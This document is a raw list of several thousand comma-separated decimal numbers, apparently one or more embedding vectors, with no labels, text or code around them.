0.008268287405371666, -0.01817643828690052, -0.002553667174652219, 0.031356655061244965, -0.002214582869783044, -0.04337210953235626, 0.04996221885085106, -0.040828023105859756, -0.04389318823814392, 0.003249076660722494, 0.01242158841341734, 0.003162869019433856, -0.020000213757157326, 0.009134196676313877, 0.003114975756034255, -0.0041609639301896095, -0.03601570799946785, 0.03196968883275986, 0.030176566913723946, -0.020383359864354134, -0.002555582672357559, -0.021195627748966217, -0.020061517134308815, 0.0011800891952589154, 0.016168754547834396, -0.02378569357097149, -0.013693632557988167, -0.04263646900653839, 0.022360391914844513, 0.025165019556879997, 0.028919847682118416, 0.01791589893400669, 0.01334880106151104, 0.009708915837109089, -0.05505039542913437, 0.037578944116830826, -0.02743324264883995, -0.040613461285829544, 0.015019317157566547, 0.0030460094567388296, -0.04104258120059967, 0.04377058148384094, -0.005865962710231543, -0.01578560844063759, -0.004819974768906832, -0.0011034600902348757, -0.02160942554473877, -0.028981151059269905, -0.009854511357843876, 0.02459796331822872, -0.017210911959409714, -0.0011446481803432107, -0.00409966055303812, -0.014176396653056145, 0.005969412159174681, -0.009931140579283237, 0.026590321213006973, 0.02107302099466324, -0.017486777156591415, -0.019800977781414986, 0.04064411297440529, -0.03555593267083168, -0.014720463193953037, 0.020276078954339027, -0.026544343680143356, 0.001996189821511507, -0.009302780963480473, 0.009509679861366749, -0.03178577870130539, -0.016015496104955673, -0.018130460754036903, -0.03445247560739517, -0.03325705975294113, 0.01568599045276642, 0.019816303625702858, 0.015264530666172504, -0.02360178343951702, -0.015502081252634525, -0.01897338218986988, -0.011249162256717682, -0.025701424106955528, -0.03442182391881943, 0.02994667924940586, 0.03518811613321304, -0.044046446681022644, 0.010858353227376938, 0.005927266087383032, 0.007187815848737955, 0.0037931439001113176, 0.021456167101860046, -0.018789472058415413, -0.025287626311182976, 0.014176396653056145, 0.0022375716362148523, -0.006797007285058498, 0.008275950327515602, -0.06424589455127716, -0.029241690412163734, -0.004770165774971247, 0.04214604198932648, -0.018988708034157753, 0.015325834043323994, 0.003390840720385313, -0.009977118112146854, 0.01160165574401617, 0.03938739374279976, 0.024230143055319786, -0.015057631768286228, 0.018728168681263924, 0.007115018554031849, 0.01364765502512455, -0.05036069080233574, 0.0027586501091718674, 0.025486862286925316, 0.022774189710617065, 0.008881320245563984, -0.008850669488310814, -0.0018467629561200738, -0.014919699169695377, 0.05719601362943649, -0.0038314585108309984, 0.012498217634856701, -0.017088305205106735, -0.036383528262376785, -0.04275907576084137, 0.02446003071963787, -0.01043689250946045, 0.008666759356856346, -0.03166317194700241, -0.010889004915952682, -0.016367990523576736, 0.004770165774971247, -0.006636085920035839, 0.025195671245455742, -0.004042188636958599, -0.028061602264642715, -0.02308070659637451, 0.03497355431318283, 0.015149586834013462, 0.019402505829930305, 0.014728126116096973, 0.004839132074266672, 0.007440692279487848, -0.034145958721637726, -0.015003991313278675, -0.005762513726949692, -0.0037988910917192698, -0.004482806194573641, 0.04088932275772095, 0.011318128556013107, 0.011218510568141937, -0.011724262498319149, -0.027402590960264206, 0.019739674404263496, -0.012789408676326275, -0.029778094962239265, 0.031755127012729645, -0.016950372606515884, 0.001578560913912952, -0.00882001779973507, 0.014306665398180485, -0.038038719445466995, 0.013141902163624763, -0.007410040590912104, -0.004739514086395502, -0.009272129274904728, 0.002894666977226734, -0.004609244409948587, 0.022452346980571747, -0.015264530666172504, -0.011846869252622128, 0.01935652829706669, -0.0019281815038993955, -0.006168648134917021, -0.005919603165239096, -0.021256931126117706, 0.00845986045897007, 0.02603859081864357, 0.04588554799556732, -0.011456061154603958, -0.009839185513556004, 0.023908300325274467, -0.009923477657139301, -0.03359422832727432, -0.018620887771248817, 0.02432209812104702, 0.01354803703725338, -0.0374256856739521, -0.0006446428596973419, -0.022559627890586853, 0.01869751699268818, 0.02689683809876442, -0.026467714458703995, 0.014582530595362186, -0.03060569055378437, -0.002699262462556362, 0.002961717313155532, -0.004873615223914385, -0.0029425600077956915, 0.006145659368485212, -0.006869805045425892, -0.010889004915952682, -0.01176257710903883, -0.01691972091794014, -0.013479070737957954, 0.02564012072980404, -0.0022318244446069, -0.0012777913361787796, 0.018590236082673073, 0.02823018655180931, -0.0002641311730258167, 0.011555679142475128, -0.0010459881741553545, -0.002505773911252618, -0.013517385348677635, -0.0024119031149894, 0.013494396582245827, 0.013777924701571465, -0.012153386138379574, -0.011938824318349361, 0.021793335676193237, -0.0010095892939716578, 0.012697453610599041, -0.0009478070423938334, -0.011049926280975342, 0.016505923122167587, 0.022697560489177704, 0.00705371517688036, 0.004134143702685833, 0.0425751656293869, -0.002409987384453416, 0.0025000267196446657, 0.026912163943052292, 0.009862174279987812, 0.0070920297876000404, -0.0043563684448599815, -0.06522674858570099, 0.004705030936747789, 0.014881384558975697, 0.011708936654031277, 0.0043525369837880135, -0.03331836313009262, -0.0035996551159769297, -0.002413818845525384, -0.006206962745636702, 0.003752913558855653, 0.033287711441516876, 0.031755127012729645, -0.028138231486082077, -0.005421513691544533, 0.03138730674982071, 0.02781638875603676, -0.00344639690592885, -0.008712736889719963, 0.0013764514587819576, -0.009302780963480473, 0.018820123746991158, -0.03754829242825508, 0.03708851709961891, -0.01652124896645546, -0.011057589203119278, 0.017869921401143074, 0.015540395863354206, 0.02485850267112255, -0.0012452240334823728, -0.0034578912891447544, 0.012053768150508404, -0.011088240891695023, -0.0062989178113639355, -0.016367990523576736, -0.01255952101200819, -0.003480880055576563, 0.005544120445847511, 0.0033237901516258717, -0.0034636384807527065, 0.016153428703546524, -0.011647633276879787, -0.01719558611512184, -0.0037337562534958124, 0.026651624590158463, -0.0009118870948441327, -0.0018860354321077466, -0.017072979360818863, 0.0039176661521196365, 0.04499664902687073, 0.016475271433591843, -0.010605476796627045, 0.005478985607624054, -0.009823859669268131, -0.01586223766207695, 0.007325748447328806, -0.0006312328041531146, 0.009471365250647068, 0.018329696729779243, 0.0032260881271213293, 0.03092753328382969, -0.04652922973036766, -0.0037395034451037645, -0.011593992821872234, 0.005682053044438362, 0.006325738038867712, -0.003720346139743924, 0.0022318244446069, 0.006931108422577381, -0.039816517382860184, -0.0009593014256097376, 0.001162847620435059, -0.016107451170682907, -0.016230057924985886, -0.025532839819788933, -0.0105748251080513, 0.003942570649087429, 0.009831522591412067, 0.01678178831934929, -0.029778094962239265, -0.04263646900653839, 0.003850615816190839, -0.030958184972405434, 0.014620845206081867, -0.018053831532597542, 0.009203162975609303, -0.009433050639927387, 0.01691972091794014, -0.03365553170442581, 0.014896710403263569, 0.00558626651763916, -0.009233814664185047, -0.026345107704401016, 0.01950978673994541, -0.01398482359945774, 0.0016973360907286406, -0.017609383910894394, -0.027862366288900375, 0.010590150952339172, -0.018329696729779243, -0.010176354087889194, -0.0006824785377830267, -0.016153428703546524, -0.05425345152616501, 0.0065594566985964775, -0.01503464300185442, 0.020582593977451324, -0.000603454711381346, 0.03926478698849678, 0.0016293276567012072, 0.010651454329490662, -0.01869751699268818, 0.017532754689455032, -0.004026862792670727, -0.00859779305756092, -0.012007790617644787, 0.013708958402276039, -0.011057589203119278, 0.011287476867437363, -0.03239881247282028, -0.007130344398319721, 0.015180238522589207, 0.002881256863474846, -0.027325961738824844, 0.007885141298174858, -0.03478964418172836, -0.022835493087768555, 0.02424546889960766, -0.017486777156591415, -0.015057631768286228, 0.013019295409321785, 0.00705371517688036, 0.016904395073652267, -0.0015095946146175265, 0.007831500843167305, 0.017011675983667374, 0.002798880450427532, -0.020766504108905792, 0.006072861608117819, -0.018406325951218605, 0.0045670983381569386, 0.003486627247184515, -0.03445247560739517, 0.010260645300149918, 0.022253111004829407, 0.03252141922712326, 0.044261008501052856, -0.00017936015501618385, 0.004559435416013002, -0.010153365321457386, 0.012413925491273403, -0.013241520151495934, -0.02081248164176941, 0.0012433083029463887, -0.0016781787853688002, -0.0052107833325862885, -0.008452197536826134, -0.02980874665081501, 0.0034559755586087704, 0.0011360273929312825, -0.012115071527659893, -0.0024521334562450647, -0.05195457488298416, 0.08533424139022827, 0.005996232386678457, -0.01790057308971882, 0.00022785204055253416, -0.004540278110653162, -0.01437563169747591, -0.011026937514543533, 0.010459881275892258, 0.014950350858271122, 0.06252939999103546, -0.001112080761231482, -0.014069115743041039, -0.02378569357097149, 0.013410104438662529, 0.0027682287618517876, 0.0030440937262028456, -0.018528932705521584, 0.004425334744155407, 0.004226098768413067, -0.01843697763979435, -0.03834523633122444, 0.005057525355368853, -0.02378569357097149, -0.01698102429509163, 0.021992571651935577, -0.06853713095188141, 0.043647974729537964, 0.009302780963480473, -0.017027001827955246, -0.007931118831038475, 0.054498665034770966, 0.005739524960517883, -0.017302867025136948, -0.004570929799228907, -0.028506051748991013, -0.013379452750086784, 0.01969369687139988, -0.005222277715802193, 0.014597856439650059, -0.004042188636958599, -0.0070958612486720085, -0.01586223766207695, 0.0022375716362148523, -0.003114975756034255, 0.014352642931044102, 0.018360348418354988, 0.026590321213006973, -0.010866016149520874, 0.0076437597163021564, -0.022038549184799194, 0.01678178831934929, -0.028061602264642715, 0.041011929512023926, -0.015846911817789078, -0.013241520151495934, -0.029578858986496925, 0.053364552557468414, -0.030758948996663094, -0.025931309908628464, -0.020260753110051155, -0.02128758281469345, 0.020184123888611794, -0.037241775542497635, -0.024475356563925743, 0.010444555431604385, -0.020000213757157326, 0.027785737067461014, 0.0074521866627037525, 0.014889047481119633, -0.01606147363781929, 0.025824030861258507, 0.0014233868569135666, -0.011869858019053936, 0.012927341274917126, 0.018590236082673073, -0.0005656190332956612, -0.010199342854321003, 0.0007064251694828272, -0.001160931889899075, -0.007689737249165773, -0.02988537587225437, 0.0013199374079704285, -0.01977032609283924, -0.00023359923216048628, 0.01598484441637993, -0.0182990450412035, -0.007183984387665987, -0.0016609372105449438, -0.017931224778294563, 0.043862536549568176, -0.02121095359325409, -0.02623782679438591, -0.011187858879566193, 0.001808448345400393, -0.03613831475377083, -0.008689748123288155, -0.01374727301299572, 0.023877648636698723, 0.005513468757271767, -0.01216104906052351, 0.013609340414404869, -0.004716525319963694, -0.02484317682683468, 0.0006906203925609589, -0.012115071527659893, 0.03013058938086033, -0.002641790546476841, 0.013302823528647423, -0.009540331549942493, -0.02675890550017357, -0.0020689875818789005, 0.01212273444980383, -0.002785470336675644, -0.019479135051369667, 0.0007610234315507114, 0.01679711416363716, -0.029180387035012245, -0.0017366085667163134, -0.011877520941197872, 0.026406411081552505, 0.009264466352760792, -0.0033084643073379993, 0.008467523381114006, -0.004091997630894184, -0.015410126186907291, 0.003532604780048132, 0.005823816638439894, 0.025134367868304253, 0.010843027383089066, -0.004616907332092524, 0.020659223198890686, -0.0004700720601249486, 0.008252961561083794, -0.03613831475377083, 0.0156400129199028, 0.025870008394122124, 0.0018879511626437306, -0.020705200731754303, -0.003113060025498271, -0.006934939883649349, -0.010459881275892258, -0.0014751114649698138, -0.039234135299921036, -0.015088283456861973, 0.029042454436421394, 0.019448483362793922, -0.005279749631881714, 0.010812375694513321, -0.0001763668260537088, 0.016935046762228012, -0.009011589922010899, 0.019601741805672646, -0.032950542867183685, -0.0037931439001113176, -0.007329579908400774, -0.026023264974355698, -0.03178577870130539, 0.025624794885516167, -0.0028659310191869736, -0.012367947958409786, -0.006180142518132925, 0.019325876608490944, 0.034544430673122406, -0.01239859964698553, 0.01433731708675623, -0.025701424106955528, -0.04236060380935669, -0.006934939883649349, 0.007126512937247753, -0.010283634066581726, -0.006747198291122913, -0.02386232279241085, -0.009394736029207706, -0.024766547605395317, 0.0144369350746274, 0.03705786541104317, 0.025609469041228294, -0.014413946308195591, 0.01031428575515747, -0.02003086544573307, -0.004448323044925928, -0.02406155876815319, 0.03647548332810402, -0.022912122309207916, 0.014398620463907719, -0.01127215102314949, -0.014260688796639442, -0.0034636384807527065, -0.0157243050634861, -0.0073065911419689655, -0.003492374438792467, 0.005375536158680916, -0.014122756198048592, -0.011195521801710129, -0.019739674404263496, -0.011463724076747894, -0.012743431143462658, -0.02067454904317856, -0.05137219652533531, 0.019325876608490944, -0.01737949624657631, 0.0075019956566393375, -0.00409966055303812, 0.004869783762842417, 0.001485647982917726, 0.006164816673845053, -0.009180174209177494, 0.0017931225011125207, -0.0020747347734868526, -0.0006762524135410786, -0.052782170474529266, 0.015348822809755802, -0.023755041882395744, 0.025594143196940422, -0.011969476006925106, -0.017364170402288437, 0.017210911959409714, -0.004980896133929491, 0.019004033878445625, -0.01797720231115818, 0.0018620888004079461, -0.001852510147728026, 0.03779350593686104, 0.018145786598324776, 0.03653678670525551, 0.028521377593278885, 0.000606328307185322, 0.017364170402288437, 0.015402463264763355, -0.0011264487402513623, -0.010797049850225449, 0.009739567525684834, 0.026130545884370804, 0.016245383769273758, -0.0037299247924238443, -0.01883544959127903, 0.03537202626466751, 0.021103672683238983, -0.004118817858397961, -0.020107494667172432, -0.04214604198932648, 0.0061073447577655315, 0.02246767282485962, -0.016168754547834396, 0.025563491508364677, -0.006421524565666914, 0.023969603702425957, 0.0016992518212646246, -0.004919592756778002, 0.006436850409954786, -0.011578667908906937, -0.03026852197945118, -0.031034814193844795, -0.01652124896645546, -0.04616141319274902, -0.021732032299041748, 0.011417746543884277, 0.034544430673122406, -0.026590321213006973, -0.0048084803856909275, -0.009180174209177494, -0.014352642931044102, 0.013042284175753593, -0.002515352563932538, 0.021624751389026642, -0.007233793381601572, -0.020965740084648132, -0.0005842974060215056, 0.010383252054452896, 0.05934162810444832, -0.011839206330478191, -0.020996391773223877, -0.030850904062390327, 0.003289307001978159, -0.020046191290020943, 0.03635287657380104, -0.016567226499319077, -0.005582435056567192, -0.018452303484082222, 0.0009229025454260409, -0.004038357175886631, 0.00855947844684124, 0.00023671229428146034, 0.0013151480816304684, 0.04508860409259796, -0.010390914976596832, 0.005011547822505236, 0.008344916626811028, 0.023111358284950256, 0.0005229940870776772, -0.0009109292295761406, 0.030375802889466286, -0.009655275382101536, -0.018620887771248817, -0.007375557441264391, 0.00025287625612691045, 0.012145723216235638, -0.004053683020174503, -0.011647633276879787, 0.014551878906786442, -0.006628422997891903, -0.02933364547789097, 0.03060569055378437, -0.017823943868279457, -0.013992486521601677, -0.04122649133205414, 0.00021073021343909204, -0.021578773856163025, 0.011831543408334255, 0.02280484139919281, -0.01803850568830967, -0.004333379678428173, -0.001259592012502253, 0.008214646950364113, 0.07521919161081314, 0.003660958493128419, -0.021732032299041748, -0.012743431143462658, -0.014153407886624336, -0.03436052054166794, -0.004501963499933481, -0.013333475217223167, 0.008268287405371666, -0.009900488890707493, 0.030314499512314796, -0.01639864221215248, -0.015517407096922398, -0.0017969539621844888, 0.005325727164745331, -0.00452495226636529, 0.008375568315386772, 0.01875882036983967, 0.007578624878078699, 0.012674464844167233, -0.014643833972513676, 0.019187944009900093, 0.006145659368485212, -0.007938781753182411, 0.009226151742041111, -0.004130312241613865, -0.015318171121180058, -0.008444534614682198, -0.0037490820977836847, 0.014452260918915272, -0.021762683987617493, 0.018728168681263924, 0.00723762484267354, 0.005819985177367926, 0.0009430177160538733, -0.006237614434212446, 0.009954129345715046, -0.02941027469933033, 0.020107494667172432, -0.03178577870130539, 0.01771666295826435, -0.003992379643023014, -0.0019243500428274274, -0.016689833253622055, -0.00566672720015049, -0.02167072892189026, 0.02933364547789097, -0.012329633347690105, 0.00040924764471128583, -0.022988751530647278, -0.006563288159668446, -0.00426058191806078, -0.01229898165911436, 0.0010814291890710592, 0.0174407996237278, -0.016751136630773544, 0.02821486070752144, 0.019249247387051582, -0.007954107597470284, 0.00028472524718381464, -0.01777796633541584, 0.00148756371345371, 0.00583147956058383, -0.030774274840950966, 0.01718026027083397, 0.0010488617699593306, 0.002408071653917432, -0.028322141617536545, -0.018682191148400307, 0.02326461486518383, 0.006245277356356382, 0.000008343899025931023, -0.021302908658981323, -0.005827648099511862, 0.010421566665172577, 0.0003295054193586111, 0.006233782973140478, 0.0023027064744383097, 0.00334677891805768, -0.00855947844684124, 0.02398492954671383, 0.03282793611288071, -0.007992422208189964, 0.022360391914844513, 0.011057589203119278, 0.026605647057294846, -0.0033065485768020153, -0.013210868462920189, 0.013080598786473274, 0.010061410255730152, -0.004865952301770449, 0.034728340804576874, 0.029517555609345436, 0.006781681440770626, 0.007107355631887913, 0.005904277320951223, 0.015708979219198227, -0.010038421489298344, 0.003496205899864435, -0.019617067649960518, 0.015563384629786015, 0.004693536553531885, 0.015318171121180058, 0.02426079474389553, 0.008674422279000282, 0.003946402110159397, -0.011655296199023724, 0.02875126339495182, -0.004114986397325993, -0.012574846856296062, -0.017808618023991585, -0.010482870042324066, -0.0047126938588917255, -0.030682319775223732, -0.022850818932056427, 0.01618408039212227, -0.008574804291129112, 0.018666865304112434, 0.00621079420670867, 0.006724209524691105, -0.021256931126117706, -0.00882001779973507, -0.0001094959006877616, 0.024613289162516594, 0.01638331636786461, 0.03785480931401253, -0.01725688949227333, 0.002785470336675644, 0.013471407815814018, -0.0009214657475240529, 0.015126598067581654, 0.019984887912869453, 0.010000106878578663, -0.028306815773248672, 0.010889004915952682, -0.018820123746991158, -0.009218488819897175, -0.01304994709789753, -0.027448568493127823, -0.009923477657139301, -0.019402505829930305, 0.0025632455945014954, 0.015218553133308887, -0.01523387897759676, 0.010881341993808746, -0.009111207909882069, -0.01803850568830967, 0.0007557551725767553, -0.006536467932164669, 0.03218425065279007, 0.006651411764323711, -0.00988516304641962, 0.012544195167720318, -0.010590150952339172, -0.014758777804672718, -0.015019317157566547, 0.0017346928361803293, -0.046498578041791916, -0.004781660158187151, 0.004367862828075886, 0.03549462929368019, 0.011456061154603958, 0.00859779305756092, -0.017486777156591415, -0.0009075767011381686, 0.014567204751074314, 0.01559403631836176, -0.013639992102980614, -0.03819197788834572, -0.007429197896271944, 0.02352515421807766, 0.013609340414404869, -0.028521377593278885, -0.004980896133929491, 0.025563491508364677, 0.02288147062063217, -0.01996956206858158, -0.010214668698608875, 0.015187901444733143, -0.005076682660728693, -0.01384689100086689, 0.022789515554904938, -0.008643770590424538, 0.006777849979698658, 0.007115018554031849, -0.02167072892189026, -0.008252961561083794, 0.010076736100018024, -0.04453687369823456, 0.004268244840204716, 0.0005948339239694178, 0.010429229587316513, -0.012115071527659893, -0.01229898165911436, 0.006762524135410786, -0.040214989334344864, -0.015425452031195164, -0.018023179844021797, 0.015463766641914845, 0.006911951117217541, 0.004245256073772907, 0.02438340149819851, -0.003488542977720499, 0.010643791407346725, -0.005080514121800661, 0.019862281158566475, 0.02597728744149208, -0.011632307432591915, 0.01014570239931345, 0.004831469152122736, 0.013080598786473274, 0.00918783713132143, -0.001022041542455554, 0.007138007320463657, 0.012728105299174786, -0.023142009973526, -0.02755584940314293, -0.0072567821480333805, 0.003816132666543126, 0.01863621361553669, -0.014268351718783379, 0.00018091668607667089, 0.006965591572225094, -0.006712715141475201, 0.013003969565033913, 0.014582530595362186, 0.04245255887508392, -0.011256825178861618, -0.0144369350746274, 0.04751008376479149, 0.006092018913477659, -0.0001255999959539622, -0.004348705522716045, 0.00019648198212962598, 0.02689683809876442, -0.01255952101200819, 0.0030766611453145742, 0.0005416724598035216, -0.005735693499445915, 0.003906172001734376, 0.030053960159420967, 0.014720463193953037, 0.004049851559102535, 0.0032758968882262707, -0.01613810285925865, -0.0001830718683777377, 0.00994646642357111, -0.0301459152251482, -0.001070892671123147, -0.002513436833396554, -0.021302908658981323, -0.025701424106955528, 0.008122691884636879, -0.03252141922712326, 0.015563384629786015, 0.020107494667172432, -0.010000106878578663, 0.002977043157443404, -0.003860194468870759, -0.023050054907798767, 0.035985056310892105, -0.017103631049394608, -0.013141902163624763, 0.019387179985642433, -0.022176481783390045, 0.019739674404263496, -0.0014080610126256943, 0.0036896944511681795, 0.021915942430496216, -0.010743409395217896, -0.009854511357843876, 0.0016408220399171114, 0.007601613644510508, -0.011593992821872234, -0.02465926669538021, -0.01917261816561222, 0.015892889350652695, -0.004371694289147854, -0.021164976060390472, 0.0035594250075519085, 0.028506051748991013, 0.02763247862458229, 0.02200789749622345, -0.017088305205106735, -0.006122670602053404, 0.025011761114001274, -0.005743356421589851, -0.010053747333586216, -0.015632349997758865, -0.010191679932177067, 0.024429379031062126, 0.008053725585341454, -0.0056973788887262344, 0.016092125326395035, 0.017961876466870308, 0.028199534863233566, -0.011885183863341808, 0.008980938233435154, -0.02318798564374447, -0.000029514203561120667, 0.004927255678921938, 0.018130460754036903, 0.003950233571231365, -0.00004469037230592221, -0.020735852420330048, 0.01513426098972559, 0.01877414621412754, -0.0035115317441523075, -0.016046147793531418, -0.024276120588183403, 0.019141966477036476, -0.015969518572092056, 0.00472418824210763, -0.0018850775668397546, 0.011348780244588852, -0.014306665398180485, -0.006597771309316158, 0.017410147935152054, 0.0035670879296958447, -0.004291233606636524, -0.00855947844684124, -0.0037873967085033655, -0.016214732080698013, 0.0023391053546220064, -0.018391000106930733, 0.007226130459457636, -0.0035728351213037968, -0.01658255234360695, -0.0028563523665070534, -0.011747251264750957, -0.011854532174766064, 0.005885120015591383, 0.002413818845525384, 0.033747486770153046, 0.002798880450427532, -0.015617025084793568, 0.013072935864329338, 0.019540438428521156, -0.011080577969551086, 0.0009037452400662005, -0.023218637332320213, 0.013226194307208061, -0.018345022574067116, 0.023555805906653404, 0.009992443956434727, 0.003009610576555133, -0.007187815848737955, 0.0005938760587014258, -0.0040651774033904076, -0.03911152854561806, 0.008344916626811028, 0.0322762057185173, -0.032674677670001984, -0.022574953734874725, -0.016276035457849503, -0.008191658183932304, -0.007471343968063593, -0.014850732870399952, -0.0007864068611524999, -0.028184209018945694, -0.003118807217106223, -0.01797720231115818, -0.022391043603420258, -0.010007769800722599, -0.005141817033290863, -0.013502059504389763, -0.002890835516154766, 0.02088911086320877, -0.021502144634723663, 0.003210762282833457, -0.01083536446094513, 0.02023010142147541, 0.019984887912869453, 0.014682148583233356, 0.013931183144450188, 0.002973211696371436, 0.009739567525684834, -0.011218510568141937, -0.010988622903823853, -0.0025728242471814156, 0.0017030832823365927, -0.013111250475049019, -0.007375557441264391, -0.017471451312303543, -0.022973425686359406, 0.02934897132217884, 0.0009961791802197695, -0.008666759356856346, 0.011080577969551086, 0.044046446681022644, 0.02392362616956234, 0.007375557441264391, 0.019463809207081795, -0.01618408039212227, -0.009103544987738132, -0.016505923122167587, 0.004003874026238918, -0.00037308825994841754, -0.0009569067624397576, -0.013034621253609657, -0.008092040196061134, -0.014283677563071251, -0.0023525154683738947, 0.016076799482107162, 0.016935046762228012, 0.009057567454874516, -0.0003812301147263497, -0.001998105552047491, 0.0072108046151697636, 0.02803095057606697, -0.008084377273917198, 0.031050140038132668, -0.004341042600572109, -0.0257167499512434, -0.0043027279898524284, -0.025824030861258507, -0.011647633276879787, -0.015425452031195164, -0.028766589239239693, -0.0015124682104215026, 0.02895049937069416, 0.010229993611574173, -0.0422993004322052, -0.015770282596349716, -0.009854511357843876, -0.021195627748966217, 0.03282793611288071, -0.026130545884370804, 0.005973243620246649, -0.0026207175105810165, -0.019050011411309242, 0.029563533142209053, 0.008030736818909645, 0.0049540759064257145, -0.0058621312491595745, 0.016812440007925034, -0.00044732276001013815, -0.007153332699090242, -0.015011654235422611, -0.008766377344727516, 0.009479028172791004, -0.02803095057606697, -0.020107494667172432, -0.011739588342607021, 0.0030287678819149733, 0.0038276270497590303, -0.002894666977226734, 0.015019317157566547, -0.013793250545859337, -0.03230685740709305, 0.001107291434891522, 0.01613810285925865, 0.022988751530647278, -0.004069008864462376, -0.014720463193953037, 0.014643833972513676, -0.0030325993429869413, 0.0066054342314600945, -0.0021111336536705494, 0.009701252914965153, 0.0043525369837880135, -0.003252908121794462, 0.007034557871520519, 0.015540395863354206, 0.005593929439783096, 0.030682319775223732, -0.015387137420475483, -0.0083602424710989, 0.0006365010631270707, -0.041195839643478394, 0.041992783546447754, 0.0014176396653056145, -0.014881384558975697, 0.01533349696546793, 0.021302908658981323, 0.00649432186037302, -0.010866016149520874, -0.0032260881271213293, 0.008735725656151772, -0.005636075511574745, 0.02709607407450676, 0.016628529876470566, -0.01219936367124319, -0.01566300168633461, -0.021915942430496216, 0.02994667924940586, 0.005072851199656725, 0.00908821914345026, -0.013525048270821571, 0.0034253238700330257, 0.006651411764323711, -0.02268223464488983, 0.001988526899367571, 0.009938803501427174, 0.005869794171303511, 0.00380846974439919, 0.0039655594155192375, 0.017425473779439926, -0.018850775435566902, 0.009272129274904728, -0.02035270817577839, 0.00026820210041478276, -0.0026207175105810165, -0.007283602375537157, 0.012352622114121914, -0.0015881395665928721, -0.016643855720758438, -0.010191679932177067, 0.009341095574200153, -0.0178545955568552, 0.022636257112026215, -0.0265749953687191, 0.005670558661222458, 0.001909982063807547, 0.0027299141511321068, -0.016046147793531418, -0.008306602016091347, -0.016735810786485672, -0.002216498600319028, -0.01067444309592247, -0.006858310662209988, 0.0009200289496220648, -0.008222309872508049, -0.015111272223293781, -0.006325738038867712, 0.01665918156504631, -0.001162847620435059, 0.00826062448322773, -0.006199299823492765, -0.009479028172791004, 0.016015496104955673, -0.0038716888520866632, -0.001622622599825263, 0.009678264148533344, -0.00408050324767828, 0.006272097583860159, 0.003977053798735142, 0.0033142114989459515, -0.004862120840698481, 0.003620728151872754, 0.003220340935513377, -0.015249204821884632, 0.011440735310316086, 0.01493502501398325, 0.002687768079340458, -0.016230057924985886, 0.001714577665552497, -0.0031762791331857443, -0.006417693104594946, -0.007839163765311241, 0.004961738828569651, -0.02234506607055664, -0.014912036247551441, 0.0013237688690423965, -0.010023095645010471, -0.006651411764323711, -0.0013764514587819576, 0.005329558625817299, -0.026789557188749313, 0.00595025485381484, 0.001812279806472361, -0.003379346337169409, 0.02459796331822872, -0.019249247387051582, -0.014161070808768272, -0.0013295160606503487, 0.0035900764632970095, 0.018421651795506477, 0.022620931267738342, 0.010038421489298344, -0.0004741429875139147, 0.004911929834634066, -0.001994274090975523, -0.01123383641242981, -0.028628656640648842, 0.003852531546726823, 0.008651433512568474, -0.001438712701201439, -0.00743686081841588, -0.013915857300162315, -0.017302867025136948, -0.0012720442609861493, 0.005463659763336182, 0.0005986653850413859, -0.011540353298187256, -0.01731819286942482, -0.0061073447577655315, 0.006731872446835041, -0.010797049850225449, -0.00994646642357111, 0.02491980604827404, 0.011823880486190319, -0.006490490399301052, -0.008176332339644432, 0.0011436903150752187, -0.003396587911993265, -0.0037395034451037645, -0.0035460148938000202, -0.0008395683253183961, -0.00008195728878490627, -0.007770197931677103, 0.0048582893796265125, -0.002136038150638342, -0.018207089975476265, 0.011571004986763, 0.007728051859885454, 0.009563320316374302, -0.0012442661682143807, -0.005827648099511862, -0.02075117826461792, 0.008942623622715473, -0.026712927967309952, -0.0001713380333967507, 0.01186219509691, 0.01679711416363716, -0.021394863724708557, 0.003005779115483165, 0.03040645457804203, -0.0030536723788827658, -0.014620845206081867, 0.021517470479011536, 0.006977085955440998, 0.0032624867744743824, 0.006046041380614042, -0.0030881555285304785, 0.02777041122317314, 0.010245319455862045, -0.017869921401143074, 0.00852116383612156, -0.015164912678301334, 0.037977416068315506, 0.0096476124599576, -0.04407709836959839, -0.004540278110653162, -0.01665918156504631, 0.036843303591012955, -0.01931055076420307, -0.01989293284714222, 0.01797720231115818, -0.0035575092770159245, 0.00279313325881958, -0.02372439019382, -0.018391000106930733, -0.009540331549942493, -0.0037337562534958124, -0.0006652369629591703, 0.00984684843569994, -0.01338711567223072, -0.009341095574200153, 0.003957896493375301, -0.0018496365519240499, 0.0006642790976911783, 0.0016082547372207046, 0.011984801851212978, -0.018866101279854774, -0.026222500950098038, 0.017027001827955246, 0.006122670602053404, -0.008383231237530708, -0.012444577179849148, 0.02274353802204132, 0.002084313426166773, 0.003157121827825904, -0.003015357768163085, 0.009325769729912281, 0.02901180274784565, -0.0033276216126978397, 0.006226120050996542, 0.012475228868424892, -0.007639928255230188, 0.007605445105582476, -0.018482955172657967, -0.009823859669268131, -0.002314200857654214, -0.004705030936747789, -0.005302738398313522, -0.016168754547834396, -0.02102704346179962, -0.009961792267858982, -0.02003086544573307, 0.00316478474996984, 0.0005799870123155415, 0.001623580465093255, -0.01724156364798546, -0.014329654164612293, -0.014927362091839314, 0.01324918307363987, 0.005337221547961235, 0.021456167101860046, -0.01282006036490202, -0.003703104564920068, -0.0022356559056788683, -0.011226173490285873, 0.01295032911002636, 0.003335284534841776, -0.021256931126117706, 0.009295118041336536, 0.015341159887611866, 0.007892804220318794, 0.007651422638446093, 0.01737949624657631, -0.008413882926106453, 0.0174407996237278, 0.002505773911252618, 0.017471451312303543, 0.003295054193586111, -0.0010344937909394503, -0.009908151812851429, 0.023831671103835106, 0.00048132697702385485, 0.006168648134917021, -0.011563342064619064, 0.011977138929069042, 0.012429251335561275, -0.007521152961999178, 0.01698102429509163, 0.0031820263247936964, -0.008881320245563984, 0.025931309908628464, -0.017226237803697586, -0.012843049131333828, 0.022314414381980896, -0.0016475270967930555, -0.006505816243588924, -0.023693738505244255, 0.0014952266355976462, -0.00938707310706377, -0.011011611670255661, 0.006333400961011648, 0.005716536194086075, 0.021241605281829834, 0.015425452031195164, 0.020398685708642006, 0.02465926669538021, -0.00003122039925074205, -0.02294277399778366, 0.013410104438662529, -0.005471322685480118, -0.0020747347734868526, 0.002701178193092346, 0.007026894949376583, 0.011057589203119278, 0.006275929044932127, 0.01018401701003313, 0.00008285528747364879, 0.013356463983654976, 0.01949446089565754, 0.002745239995419979, -0.017823943868279457, 0.020797155797481537, -0.017670687288045883, 0.013463744893670082, 0.0141457449644804, -0.020184123888611794, 0.012291318736970425, -0.017502103000879288, 0.002599644474685192, -0.009915814734995365, 0.013164890930056572, -0.012743431143462658, -0.0068008387461304665, 0.00786215253174305, -0.004582424182444811, 0.0013860301114618778, 0.0005215572891756892, 0.02623782679438591, -0.004965570289641619, 